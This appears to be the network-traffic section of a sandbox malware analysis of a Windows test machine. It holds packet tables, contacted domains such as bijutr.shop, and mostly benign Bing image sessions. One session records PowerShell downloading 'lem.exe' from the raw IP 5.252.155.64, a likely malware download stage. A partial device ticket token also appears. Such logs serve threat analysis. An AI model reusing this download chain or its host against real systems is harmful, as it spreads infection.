                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.879343987 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.880812883 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.881155968 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.881170034 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.882249117 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.882597923 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.882766008 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.883148909 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.923353910 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.057656050 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.191718102 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.191796064 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.191860914 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.192395926 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.192411900 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265608072 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265700102 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265777111 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265995026 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.266006947 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313486099 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313678026 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313776016 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313853979 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313874006 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.575809002 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576020956 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576040983 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576142073 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576395035 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576416016 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576437950 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576751947 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576824903 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.577006102 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.577334881 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.577451944 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.681598902 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.771240950 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.873754025 CET44350102162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.876852036 CET44350101162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.962352037 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:16.026222944 CET50101443192.168.2.6162.159.61.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 27, 2024 07:10:51.510384083 CET | 192.168.2.6 | 1.1.1.1 | c235 | (Port unreachable) | Destination Unreachable
Dec 27, 2024 07:11:10.658396006 CET | 192.168.2.6 | 1.1.1.1 | c29a | (Port unreachable) | Destination Unreachable
• tse1.mm.bing.net
• t.me
• bijutr.shop
• www.google.com
• clients2.googleusercontent.com
• chrome.cloudflare-dns.com
• 5.252.155.64
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49773        5.252.155.64    80                7456  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 27, 2024 07:09:30.334574938 CET  69                 OUT        GET /lem.exe HTTP/1.1
Host: 5.252.155.64
Connection: Keep-Alive
Dec 27, 2024 07:09:31.597779989 CET  1236               IN         HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 06:09:31 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Fri, 27 Dec 2024 04:44:48 GMT
ETag: "136ffc-62a391f62da6d"
Accept-Ranges: bytes
Content-Length: 1273852
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program


Session ID: 0; Source IP: 192.168.2.6; Source Port: 49707; Destination IP: 20.198.119.143; Destination Port: 443


Session ID: 1; Source IP: 192.168.2.6; Source Port: 49712; Destination IP: 20.198.118.190; Destination Port: 443


Session ID: 2; Source IP: 192.168.2.6; Source Port: 49714; Destination IP: 20.198.118.190; Destination Port: 443


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.6 | 49719 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:15 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305
    MS-CV: vtSf0wrdjU+fVm0r.1
    Context: 8564f1187f498e3d
2024-12-27 06:09:15 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:09:15 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061
    MS-CV: vtSf0wrdjU+fVm0r.2
    Context: 8564f1187f498e3d

    <device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:09:15 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197
    MS-CV: vtSf0wrdjU+fVm0r.3
    Context: 8564f1187f498e3d

    <wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-27 06:09:16 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-27 06:09:16 UTC | 58 | IN | Data Ascii: MS-CV: BwawiiYLd0idOUSbBHQBIA.0

    Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49731 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:19 UTC | 346 | OUT | GET /th?id=OADD2.10239400728442_1ZZPG5YB8L69HFW32&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Host: tse1.mm.bing.net
    Connection: Keep-Alive
2024-12-27 06:09:19 UTC | 854 | IN | HTTP/1.1 200 OK
    Cache-Control: public, max-age=2592000
    Content-Length: 683792
    Content-Type: image/jpeg
    X-Cache: TCP_HIT
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Headers: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Timing-Allow-Origin: *
    Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    X-MSEdge-Ref: Ref A: B41EFA29348A44D08B22DF27FBC7EAA8 Ref B: EWR30EDGE0119 Ref C: 2024-12-27T06:09:19Z
    Date: Fri, 27 Dec 2024 06:09:19 GMT
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49730 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:19 UTC | 375 | OUT | GET /th?id=OADD2.10239400728441_1SJIWICR800Z51YH3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
    Host: tse1.mm.bing.net
    Connection: Keep-Alive
2024-12-27 06:09:19 UTC | 856 | IN | HTTP/1.1 200 OK
    Cache-Control: public, max-age=2592000
    Content-Length: 679699
    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 3339BD60FA7747CE80A1F9F706087FD4 Ref B: EWR311000104017 Ref C: 2024-12-27T06:09:19Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:18 GMT
                                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49733 | 150.171.27.10 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:19 UTC | 375 | OUT |
GET /th?id=OADD2.10239402414229_1P4RDVHBQE93FAZFW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-27 06:09:20 UTC | 854 | IN |
HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 510198
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: A309CF8FB3ED493283538E0CF3106A0D Ref B: EWR30EDGE1016 Ref C: 2024-12-27T06:09:19Z
Date: Fri, 27 Dec 2024 06:09:19 GMT
Connection: close
                                                                                                                                                                                                                                                                            Data Ascii: $<DEuw(P|m\ijn3X3JkGIC</02:gJJ~21KkI9vJxdHkF]=i}YG~*{9B\w<fPm"o\u,E$R$n~\Gmhal6FLxK$UYIV?0>L?I(gUIIA#?^Wq#g
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: a7 bb bc 90 09 19 7e e2 81 c7 27 ae d1 5d 6d e4 51 d8 de 5b 5c 36 ef 29 72 91 45 1a fc aa e7 1c 80 3f 13 4e 6e ec 8a 70 b2 ba 20 d3 fc 3d a6 69 97 92 1f bd e7 c7 86 dd f3 32 91 d9 7f d9 f6 ad 4d 36 d2 38 2e 25 b9 95 96 45 6c ee 8d 97 e6 c6 3b 7a 56 66 a9 26 75 a8 52 49 db ca b9 fd dc 5f 28 6e 9c fe bd 2b 52 d9 ec ac ed e5 89 d6 45 2d c7 fb 4d ed 50 e3 a1 a7 37 72 dd e5 a0 58 e3 92 e1 55 a3 dd 95 6d bb bb 74 03 fb b4 29 02 16 21 57 2d 17 ee d7 f8 b3 ef 54 bc 45 ac 5c 88 60 b0 b1 b6 56 f3 63 3b 5b 76 df 24 0c 7e 78 15 4b 56 d6 9a ca 35 31 aa cb 2a af f0 b7 dd cf 73 f8 53 84 65 62 2a 4d 5c b5 a9 44 97 1a 4f 9e bf bb 2d 1e c6 db f7 97 8c 10 7d eb 8e d6 16 4b 2b 7f 2e e5 96 4b 69 54 06 66 fb cb c5 74 76 af 79 7b a7 b5 ec 77 2d 15 b5 cc ac 60 8d a3 da 58 74 2c
                                                                                                                                                                                                                                                                            Data Ascii: ~']mQ[\6)rE?Nnp =i2M68.%El;zVf&uRI_(n+RE-MP7rXUmt)!W-TE\`Vc;[v$~xKV51*sSeb*M\DO-}K+.KiTftvy{w-`Xt,
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: ad 64 2e 6d 63 69 6d 9a 49 04 12 7f aa 93 ef 46 3b e3 da b5 e3 78 2f 6c 70 55 66 8a 75 f9 95 be 65 60 6a f9 12 31 f6 8d e8 c6 ea 46 08 ec 65 99 e2 69 0c 4a ce df 66 5f 9d 80 ed 8a cc d3 f5 1b 6b 8b 58 ee 6d ef 16 58 e4 5f 97 77 de fa 7e 1e 95 72 c2 c2 ca c6 cd ad ec e2 5b 68 d5 fc cd aa c5 b6 9e bb b9 a4 9a ce de 4b 89 64 68 20 69 3e ff 00 ee d4 6e 90 e3 a9 ff 00 6a 8b 02 9e a4 6b a8 41 1c 8b 1e e5 69 24 fb ab 1b 6e dd f9 73 8a d1 83 cc 95 78 5e 3f bd 54 2c 2d ac a3 93 ed 29 67 1c 72 37 de 6d a3 77 bf 35 b5 6e c0 56 53 b2 3a a9 cb 9b a8 eb 5b 60 bc 9e ad 56 b8 0b 8a af 34 e9 1c 6c ee ca aa bf 79 99 be 55 a7 f9 88 63 f3 47 cc 19 73 f2 fa 57 3b 4d 9d 2a 56 0b cb 88 2d ed 5a 5b 99 56 28 d5 49 66 6f e1 02 bc c7 50 d4 6d af b5 25 b6 8e 36 90 4f 21 3e 66 e0 8b
                                                                                                                                                                                                                                                                            Data Ascii: d.mcimIF;x/lpUfue`j1FeiJf_kXmX_w~r[hKdh i>njkAi$nsx^?T,-)gr7mw5nVS:[`V4lyUcGsW;M*V-Z[V(IfoPm%6O!>f
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16067INData Raw: a9 58 c4 37 41 9f 2c 19 23 db f3 29 3d 71 f8 d6 b2 91 84 29 a6 ee 73 ba df da 6c e4 6d 3e de 56 68 e3 da df 2b 7d d2 46 78 ae d7 e1 a6 ad ae 6a 7a 6c f0 6a 0c cb f6 6c 47 1d cb 7d ff 00 5c 60 f5 e3 bd 72 7e 27 36 63 50 8e 2d 3f 73 34 8b 89 19 9b ef 1c f7 fa 56 cf 85 75 2b cb 0b 59 ed 12 06 6b 98 f0 63 89 98 2b 73 f5 ea b9 15 cf 53 de 47 75 3d 15 ce b3 c4 36 31 df 68 f2 db ce cc de 7e 12 45 5f 97 77 3c 75 fc eb 9c 9b 49 8e eb c3 f3 bd bc f2 79 b6 d1 62 25 dd bb cc 78 f8 da 7e b8 fc eb 41 7c 41 67 23 47 a7 df 4f f6 6b c8 f1 e6 ee 5d cb f8 11 d7 e9 50 db 6a 5e 4e ad 2f db 65 8f ec 92 47 e6 47 2a ff 00 cb 32 4f 3d 70 47 dd 1f f7 d5 44 14 91 52 e5 93 29 db df 3d ef 87 6d ae ed 2e 7c b9 9a 31 1c f1 c9 d5 88 eb b8 63 39 15 cf f8 82 d4 c6 ca ee fe 6b 4a d8 da bf
                                                                                                                                                                                                                                                                            Data Ascii: X7A,#)=q)slm>Vh+}FxjzljlG}\`r~'6cP-?s4Vu+Ykc+sSGu=61h~E_w<uIyb%x~A|Ag#GOk]Pj^N/eGG*2O=pGDR)=m.|1c9kJ
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 00 d5 de a0 bb 8e 57 9a 39 43 33 08 ff 00 e5 97 1b 5b eb 9a 46 92 0b 2b e8 e5 f2 a3 8c cf c6 ef ba cc 4f f3 35 56 d0 84 f5 26 3b 66 56 8d f7 36 df bd b7 8d b9 a5 91 7e ee 59 97 6e 36 ed 6f 4a 6c d7 76 90 dc 2d be e9 1a 4b 96 23 6e ef bb c6 7f a5 4d 21 43 d3 ad 25 70 d3 b8 fb 3b 93 32 ec 75 da df ef 7c b4 f5 ca ab 6f ac c9 12 76 93 64 0c d1 5c 32 92 8c df 32 71 eb 57 16 59 7e cb 18 7d be 6e d1 e6 7f 12 a9 c7 34 e5 15 7d 02 32 76 d4 97 cc da d8 3d 29 33 b7 8f bd ba ab 35 c4 66 45 8c ca bb 99 72 ab ed eb 4f de bd 0b d3 e5 12 95 cb 51 83 b7 27 fe f9 aa d2 4a 7e d9 e5 fc df 77 2d ba 8d f2 26 d2 9f 32 37 de a9 64 08 eb b4 d4 da c3 6e fb 0d dd 89 17 0d b8 d4 eb 26 17 96 ac c6 93 ca dd 1a af dd e3 fd ea 9e 17 df 6f c3 73 fe d5 54 a0 38 55 e8 3a 69 33 b8 d3 61 7c
                                                                                                                                                                                                                                                                            Data Ascii: W9C3[F+O5V&;fV6~Yn6oJlv-K#nM!C%p;2u|ovd\22qWY~}n4}2v=)35fErOQ'J~w-&27dn&osT8U:i3a|
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: b3 48 db be 71 c0 db c0 01 71 52 da 68 d1 49 dc d5 f0 8d 81 1a 1d b2 41 e5 c1 0c 6b 95 55 8f e6 6c 8e 7a f4 cd 49 a9 5a ce cd 1c 6e bb a4 93 85 6d bb 92 11 dc ff 00 f5 ab 52 dd 62 87 f7 68 db 63 db fe ad 57 f5 ac b8 e4 13 6b d2 79 52 ac 8b 1a e6 4f e2 55 39 c0 c7 e1 52 95 dd ca 93 b2 45 c7 d3 e2 95 58 dd b3 5c 8d a0 6d e7 0a 07 4e 3b d6 0e 97 6b 77 06 b5 7d 79 76 bb 4e d0 2d 95 5b e4 58 fe 9f de ae 9a d6 44 6d db 5b 76 ef f8 0d 53 6d 2e c9 ae 9a 73 b9 64 6c 7d e9 09 55 c7 a0 34 bd 47 7e c6 36 a6 c5 ed 56 31 2a b0 93 2e ae bf 75 48 f5 f6 ae 77 5b f1 95 a6 97 0d 8d bd bc bf 6a 93 94 bb 81 7e fa f5 c6 4f 4d de d5 a3 ae 48 f6 2b 25 b3 ac 7e 5a e4 6e fe ef 53 f3 7b 1e 2b 8f d5 2c 46 a5 a7 ae af e5 2c 7a a5 d4 fb fc ad bb 7f 76 38 24 0f e2 e7 bd 55 ac 82 32 52
                                                                                                                                                                                                                                                                            Data Ascii: HqqRhIAkUlzIZnmRbhcWkyROU9REX\mN;kw}yvN-[XDm[vSm.sdl}U4G~6V1*.uHw[j~OMH+%~ZnS{+,F,zv8$U2R


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49732 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:19 UTC | 346 | OUT | GET /th?id=OADD2.10239402414228_1EUMX2S6TUEXTBXLL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-27 06:09:20 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 508979
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 2F48E96EB48549D28E9DE46FE4DB1A83 Ref B: EWR311000107019 Ref C: 2024-12-27T06:09:19Z
Date: Fri, 27 Dec 2024 06:09:19 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49739 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:21 UTC | 346 | OUT | GET /th?id=OADD2.10239381795017_1P2HE79XS2FOA94E1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-12-27 06:09:21 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 977500
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: ECB535836A4B499882E98FE5525ECB27 Ref B: EWR30EDGE1616 Ref C: 2024-12-27T06:09:21Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:20 GMT
                                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49745 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:23 UTC | 346 | OUT | GET /th?id=OADD2.10239381795018_1H6ENBKGWI9ZKTUAB&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
2024-12-27 06:09:23 UTC | 856 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 963785
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: E2DEC6B8F8A740549FFF39E99BA97433 Ref B: EWR311000108021 Ref C: 2024-12-27T06:09:23Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:22 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Data Ascii: m%qc'|MEsZtl>y#-_&* z=hOC*Y3r8Iqii\d}nZu;>XiG$GK{<{nx?"{Ge#mkOuX|=]H(w7Szp,Z9Og2OKM63K
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: b4 db 7f 14 47 e2 2f ed 2b 59 21 d3 e4 d1 ed ff 00 7f f6 2b 99 7e cf 35 c4 bf 77 cd 56 fe 06 fe fd 72 9e 12 96 7b 2b bf 23 54 9b 4f b8 8f ed 2f 69 f6 6b 99 7f 8f fb df ec 7f bf 5a ca 33 c4 73 7b 45 66 ad 65 bf 99 26 ce b1 73 7f 6f 69 1c 1a 8c 3e 5f 97 1b c7 e6 4b 2e cf bd fc 2b de ab e9 b7 da 96 b1 0c 7a 74 17 93 49 05 be f8 e3 92 5f f5 35 5f 76 93 71 0d cc f6 b0 fe f2 3f f5 51 cb 77 ff 00 1e ef fe cf f7 d6 b6 ac 74 1b ed 43 49 8f fb 52 f2 2d 2a eb cc ff 00 96 b1 79 36 d0 45 fe d7 fb 5f ee ad 6f 52 50 a7 0b b5 f7 80 6d 82 ee 1b 9b 5b 58 66 fe d5 93 64 16 57 b7 32 ba 7d 9e 25 ff 00 96 9f ec ff 00 c0 6a e7 82 ed bc 27 17 d8 be d5 79 fd ab 3c 9b e3 b8 fb 4c be 77 9f ff 00 5c 51 97 f7 78 ff 00 69 aa c7 88 16 3f 0d 6a 11 cd 06 a5 36 a3 25 bd b3 f9 9e 6f cf 0c
